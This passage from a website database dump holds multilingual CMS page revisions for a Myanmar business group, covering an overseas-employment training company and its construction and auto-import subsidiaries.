Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사이에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">피해가</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제이주기구</span><span style=\"mso-fareast-language:KO;\">(IOM)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제정한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국제채용청렴제도</span><span style=\"mso-fareast-language:KO;\">(IRIS)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기준에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">따라</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">근로자를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">선발하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">생산하도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 251, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards of ASEAN standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.&nbsp;</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).&nbsp;</p>', '', 'full_html'),
('page', 0, 26, 251, 'ja', 0, '<p class=\"MsoNormal\"><o:p></o:p></p><p>我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。<br>会社と労働者の間に損失がないようにInternational Organization for Migration (IOM)が定めたInternational Recruitment Integrity System(IRIS)に合った基準で管理しております。<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 251, 'ko', 0, '<p>우리 회사는 위대한 미얀마의 현재 상황과 필요에 따라 외국에서 일하고 싶은 미래의 청년들에게 훈련과 취업 기회를 제공하고 ASEAN 국제표준에 부합하는 기업을 만들기 위해 설립되었습니다.</p><p><br>고용주와 근로자 사이에 피해가 없도록 국제이주기구(IOM)에서 제정한 국제채용청렴제도(IRIS) 기준에 따라 근로자를 선발하고 생산하도록 노력하고 있습니다.<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 307, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).</p>', '', 'full_html'),
('page', 0, 26, 307, 'ja', 0, '<p class=\"MsoNormal\"><o:p></o:p></p><p>我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、アジアのスタンダード、国際スタンダードに負けない会社になることに目指しております。<br>会社と労働者の間に損失がないようにInternational Organization for Migration (IOM)が定めたInternational Recruitment Integrity System(IRIS)に合った基準で管理しております。<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 307, 'ko', 0, '<p>우리 회사는 위대한 미얀마의 현재 상황과 필요에 따라 외국에서 일하고 싶은 미래의 청년들에게 훈련과 취업 기회를 제공하고 ASEAN 국제표준에 부합하는 기업을 만들기 위해 설립되었습니다.</p><p><br>고용주와 근로자 사이에 피해가 없도록 국제이주기구(IOM)에서 제정한 국제채용청렴제도(IRIS) 기준에 따라 근로자를 선발하고 생산하도록 노력하고 있습니다.<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 308, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).</p>', '', 'full_html'),
('page', 0, 26, 308, 'ja', 0, '<p>我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、国際スタンダードに負けない会社になることに目指しております。</p><p>会社と労働者の間に損失がないようにInternational Organization for Migration (IOM)が定めたInternational Recruitment Integrity System(IRIS)に合った基準で管理しております。<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 308, 'ko', 0, '<p>우리 회사는 위대한 미얀마의 현재 상황과 필요에 따라 외국에서 일하고 싶은 미래의 청년들에게 훈련과 취업 기회를 제공하고 ASEAN 국제표준에 부합하는 기업을 만들기 위해 설립되었습니다.</p><p><br>고용주와 근로자 사이에 피해가 없도록 국제이주기구(IOM)에서 제정한 국제채용청렴제도(IRIS) 기준에 따라 근로자를 선발하고 생산하도록 노력하고 있습니다.<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 309, 'en', 0, '<p>Our company is established with the aim of creating a company that meets the international standards, providing training and employment opportunities to the future youth who want to work abroad according to the current conditions and needs of Myanmar.</p><p>In order to ensure that there is no harm between employers and employees, we are trying to select and produce workers in accordance with the standards of the International Recruitment Integrity System (IRIS) established by the International Organization for Migration (IOM).</p>', '', 'full_html'),
('page', 0, 26, 309, 'ja', 0, '<p>我々はミャンマーの現状を見抜き、海外で働きたい生徒達の訓練、能力の高い生徒達を生み出し、国際スタンダードに負けない会社になることに目指しております。</p><p>会社と労働者の間に損失がないようにInternational Organization for Migration (IOM)が定めたInternational Recruitment Integrity System(IRIS)に合った基準で管理しております。<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 26, 309, 'ko', 0, '<p>우리 회사는 현재 미얀마의 상황과 필요에 따라 외국에서 일하고 싶은 청년들에게 훈련과 해외취업 기회 제공을 목표로 설립되었습니다.</p><p>고용주와 근로자 사이에 피해가 없도록 국제이주기구(IOM)에서 제정한 국제채용청렴제도(IRIS) 기준에 따라 근로자를 선발하고 생산하도록 노력하고 있습니다.<o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 105, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 106, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 106, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 107, 'en', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 107, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 107, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 159, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol>', '', 'full_html'),
('page', 0, 27, 159, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 159, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 27, 175, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p class=\"MsoNormal\" style=\"margin-left:.5in;\">Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fair-priced Housing Projects<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Private Housing<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Projects in Health Industry&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two storied Building (Technical School At Bo-Ka-Lay)<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two Storied RCC Building (MaUPin)</li></ul><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.&nbsp;</p><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 175, 'ja', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 175, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 199, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p class=\"MsoNormal\" style=\"margin-left:.5in;\">Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; 